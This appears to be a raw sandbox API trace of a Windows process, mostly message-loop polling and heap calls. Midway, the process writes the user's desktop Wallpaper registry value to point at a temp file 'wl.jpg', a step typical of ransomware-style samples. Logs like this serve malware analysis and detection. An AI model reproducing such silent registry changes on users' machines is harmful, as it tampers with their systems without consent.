[0240.417] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6e0 | out: hHeap=0x2af0000) returned 1 [0240.417] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp/8x8x8" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\temp\\8x8x8")) returned 0x20 [0240.417] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0240.418] timeGetTime () returned 0x117c07e [0240.418] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0240.418] Sleep (dwMilliseconds=0xa) [0240.456] timeGetTime () returned 0x117c0ad [0240.456] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0240.456] Sleep (dwMilliseconds=0xa) [0240.503] timeGetTime () returned 0x117c0dc [0240.503] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0240.503] Sleep (dwMilliseconds=0xa) [0240.550] timeGetTime () returned 0x117c10a [0240.550] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0240.550] Sleep (dwMilliseconds=0xa) [0240.581] timeGetTime () returned 0x117c12a [0240.581] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0240.581] Sleep (dwMilliseconds=0xa) [0240.597] timeGetTime () returned 0x117c139 [0240.597] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0240.597] Sleep (dwMilliseconds=0xa) [0240.612] timeGetTime () returned 0x117c149 [0240.612] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0240.612] Sleep (dwMilliseconds=0xa) [0240.632] timeGetTime () returned 0x117c159 [0240.632] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0240.632] Sleep (dwMilliseconds=0xa) [0240.655] timeGetTime () returned 0x117c168 [0240.655] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0240.655] Sleep (dwMilliseconds=0xa) [0240.677] timeGetTime () returned 0x117c18a [0240.677] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0240.677] Sleep (dwMilliseconds=0xa) [0240.706] timeGetTime () returned 0x117c1a7 [0240.706] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0240.706] Sleep (dwMilliseconds=0xa) [0240.721] timeGetTime () returned 0x117c1b6 [0240.722] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0240.722] Sleep (dwMilliseconds=0xa) [0240.737] timeGetTime () returned 0x117c1c6 [0240.737] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0240.737] Sleep (dwMilliseconds=0xa) [0240.784] timeGetTime () returned 0x117c1f5 [0240.784] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0240.784] Sleep (dwMilliseconds=0xa) [0240.800] timeGetTime () returned 0x117c205 [0240.800] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0240.800] Sleep (dwMilliseconds=0xa) [0240.816] timeGetTime () returned 0x117c214 [0240.816] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0240.816] Sleep (dwMilliseconds=0xa) [0240.831] timeGetTime () returned 0x117c224 [0240.831] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0240.831] Sleep (dwMilliseconds=0xa) [0240.847] timeGetTime () returned 0x117c233 [0240.847] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0240.847] Sleep (dwMilliseconds=0xa) [0240.865] timeGetTime () returned 0x117c243 [0240.865] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0240.865] Sleep (dwMilliseconds=0xa) [0240.878] timeGetTime () returned 0x117c253 [0240.878] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0240.878] Sleep (dwMilliseconds=0xa) [0240.894] timeGetTime () returned 0x117c262 [0240.894] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0240.894] Sleep (dwMilliseconds=0xa) [0240.909] timeGetTime () returned 0x117c272 [0240.909] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0240.909] Sleep (dwMilliseconds=0xa) [0240.925] timeGetTime () returned 0x117c282 [0240.925] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0240.925] Sleep (dwMilliseconds=0xa) [0240.940] timeGetTime () returned 0x117c291 [0240.940] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0240.940] Sleep (dwMilliseconds=0xa) [0240.956] timeGetTime () returned 0x117c2a1 [0240.956] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0240.956] Sleep (dwMilliseconds=0xa) [0240.972] timeGetTime () returned 0x117c2b0 [0240.972] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0240.972] Sleep (dwMilliseconds=0xa) [0240.987] timeGetTime () returned 0x117c2c0 [0240.987] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0240.987] Sleep (dwMilliseconds=0xa) [0241.003] timeGetTime () returned 0x117c2d0 [0241.003] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0241.003] Sleep (dwMilliseconds=0xa) [0241.018] timeGetTime () returned 0x117c2df [0241.018] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0241.018] Sleep (dwMilliseconds=0xa) [0241.034] timeGetTime () returned 0x117c2ef [0241.034] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0241.034] Sleep (dwMilliseconds=0xa) [0241.050] timeGetTime () returned 0x117c2ff [0241.050] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0241.050] Sleep (dwMilliseconds=0xa) [0241.068] timeGetTime () returned 0x117c310 [0241.068] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0241.068] Sleep (dwMilliseconds=0xa) [0241.096] timeGetTime () returned 0x117c32d [0241.097] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0241.097] Sleep (dwMilliseconds=0xa) [0241.112] timeGetTime () returned 0x117c33d [0241.112] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0241.112] Sleep (dwMilliseconds=0xa) [0241.128] timeGetTime () returned 0x117c34d [0241.128] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0241.128] Sleep (dwMilliseconds=0xa) [0241.144] timeGetTime () returned 0x117c35c [0241.144] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0241.144] Sleep (dwMilliseconds=0xa) [0241.159] timeGetTime () returned 0x117c36c [0241.159] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 1 [0241.160] TranslateMessage (lpMsg=0x8cf798) returned 0 [0241.160] DispatchMessageW (lpMsg=0x8cf798) returned 0x0 [0241.160] KillTimer (hWnd=0xa02be, uIDEvent=0x1) returned 1 [0241.160] SetTimer (hWnd=0xa02be, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0241.160] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0241.160] Sleep (dwMilliseconds=0xa) [0241.175] timeGetTime () returned 0x117c37c [0241.175] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0241.175] Sleep (dwMilliseconds=0xa) [0241.262] timeGetTime () returned 0x117c3ca [0241.262] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0241.262] Sleep (dwMilliseconds=0xa) [0241.284] timeGetTime () returned 0x117c3e9 [0241.284] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0241.284] Sleep (dwMilliseconds=0xa) [0241.300] timeGetTime () returned 0x117c3f9 [0241.300] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0241.300] Sleep (dwMilliseconds=0xa) [0241.315] timeGetTime () returned 0x117c408 [0241.315] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0241.315] Sleep (dwMilliseconds=0xa) [0241.331] timeGetTime () returned 0x117c418 [0241.331] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0241.331] Sleep (dwMilliseconds=0xa) [0241.347] timeGetTime () returned 0x117c427 [0241.347] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0241.347] Sleep (dwMilliseconds=0xa) [0241.362] timeGetTime () returned 0x117c437 [0241.362] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0241.362] Sleep (dwMilliseconds=0xa) [0241.379] timeGetTime () returned 0x117c447 [0241.379] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0241.379] Sleep (dwMilliseconds=0xa) [0241.396] timeGetTime () returned 0x117c457 [0241.396] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0241.396] Sleep (dwMilliseconds=0xa) [0241.425] timeGetTime () returned 0x117c476 [0241.425] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0241.425] CharUpperBuffW (in: lpsz="tempdir", cchLength=0x7 | out: lpsz="TEMPDIR") returned 0x7 [0241.425] GetTempPathW (in: nBufferLength=0x104, lpBuffer=0x8cf438 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\") returned 0x23 [0241.425] CharUpperBuffW (in: lpsz="HKCU", cchLength=0x4 | out: lpsz="HKCU") returned 0x4 [0241.425] RegCreateKeyExW (in: hKey=0x80000001, lpSubKey="Control Panel\\Desktop", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0x20006, lpSecurityAttributes=0x0, phkResult=0x8cf850, lpdwDisposition=0x8cf86c | out: phkResult=0x8cf850*=0x4e0, lpdwDisposition=0x8cf86c*=0x2) returned 0x0 [0241.426] RegSetValueExW (in: hKey=0x4e0, lpValueName="Wallpaper", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\wl.jpg", cbData=0x54 | out: lpData="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\wl.jpg") returned 0x0 [0241.426] RegCloseKey (hKey=0x4e0) returned 0x0 [0241.426] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a737d0 | out: hHeap=0x2af0000) returned 1 [0241.426] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0241.426] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab668 | out: hHeap=0x2af0000) returned 1 [0241.426] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0241.426] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab5a8 | out: hHeap=0x2af0000) returned 1 [0241.426] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72238 | out: hHeap=0x2af0000) returned 1 [0241.426] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab560 | out: hHeap=0x2af0000) returned 1 [0241.426] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab620 | out: hHeap=0x2af0000) returned 1 [0241.426] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab638 | out: hHeap=0x2af0000) returned 1 [0241.426] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab710 | out: hHeap=0x2af0000) returned 1 [0241.426] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab698 | out: hHeap=0x2af0000) returned 1 [0241.426] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab650 | out: hHeap=0x2af0000) returned 1 [0241.426] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7878 | out: hHeap=0x2af0000) returned 1 [0241.426] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72218 | out: hHeap=0x2af0000) returned 1 [0241.426] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4d0 | out: hHeap=0x2af0000) returned 1 [0241.426] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab458 | out: hHeap=0x2af0000) returned 1 [0241.426] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab5c0 | out: hHeap=0x2af0000) returned 1 [0241.427] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0241.427] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e40 [0241.427] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72388 [0241.427] CharUpperBuffW (in: lpsz="A0F00F04C39", cchLength=0xb | out: lpsz="A0F00F04C39") returned 0xb [0241.427] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e40 | out: hHeap=0x2af0000) returned 1 [0241.427] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72388 | out: hHeap=0x2af0000) returned 1 [0241.427] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab500 [0241.427] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72338 [0241.427] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6e0 [0241.427] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4d0 [0241.427] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721d8 [0241.427] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0241.427] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72218 [0241.427] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab530 [0241.427] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72298 [0241.427] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6f8 [0241.427] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab698 [0241.427] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721d8 [0241.427] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab560 [0241.427] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0241.427] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab560 | out: hHeap=0x2af0000) returned 1 [0241.427] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab698 | out: hHeap=0x2af0000) returned 1 [0241.427] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6f8 | out: hHeap=0x2af0000) returned 1 [0241.427] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0241.427] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab5a8 [0241.427] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77bc0 [0241.428] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab5c0 [0241.428] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72348 [0241.428] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab5c0 | out: hHeap=0x2af0000) returned 1 [0241.428] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77af8 [0241.428] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab560 [0241.428] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e18 [0241.428] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab470 [0241.428] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72228 [0241.428] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab470 | out: hHeap=0x2af0000) returned 1 [0241.428] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b20 [0241.428] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab5c0 [0241.428] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab620 [0241.428] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab638 [0241.428] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab578 [0241.428] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72368 [0241.428] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72368 | out: hHeap=0x2af0000) returned 1 [0241.428] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e40 [0241.428] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4a0 [0241.428] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72368 [0241.428] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4a0 | out: hHeap=0x2af0000) returned 1 [0241.428] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f58 [0241.428] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4e8 [0241.428] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab638 | out: hHeap=0x2af0000) returned 1 [0241.428] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab578 | out: hHeap=0x2af0000) returned 1 [0241.428] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab620 | out: hHeap=0x2af0000) returned 1 [0241.428] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab620 [0241.429] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab698 [0241.429] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab578 [0241.429] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72388 [0241.429] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72388 | out: hHeap=0x2af0000) returned 1 [0241.429] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cd8 [0241.429] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4a0 [0241.429] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72388 [0241.429] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4a0 | out: hHeap=0x2af0000) returned 1 [0241.429] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77dc8 [0241.429] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab458 [0241.429] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab698 | out: hHeap=0x2af0000) returned 1 [0241.429] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab578 | out: hHeap=0x2af0000) returned 1 [0241.429] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab620 | out: hHeap=0x2af0000) returned 1 [0241.429] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de40 [0241.429] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0241.429] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72238 [0241.429] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72398 [0241.429] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6f8 [0241.429] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab578 [0241.429] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721d8 [0241.429] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab710 [0241.429] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0241.429] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721a8 [0241.429] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77a80 [0241.430] CharUpperBuffW (in: lpsz="SSA0F00F04C39", cchLength=0xd | out: lpsz="SSA0F00F04C39") returned 0xd [0241.430] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77a80 | out: hHeap=0x2af0000) returned 1 [0241.430] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721a8 | out: hHeap=0x2af0000) returned 1 [0241.430] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab710 | out: hHeap=0x2af0000) returned 1 [0241.430] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab578 | out: hHeap=0x2af0000) returned 1 [0241.430] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6f8 | out: hHeap=0x2af0000) returned 1 [0241.430] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0241.430] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72238 | out: hHeap=0x2af0000) returned 1 [0241.430] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e640 [0241.430] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0241.430] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e640 | out: hHeap=0x2af0000) returned 1 [0241.430] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0241.430] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab470 [0241.430] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72398 [0241.430] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab470 | out: hHeap=0x2af0000) returned 1 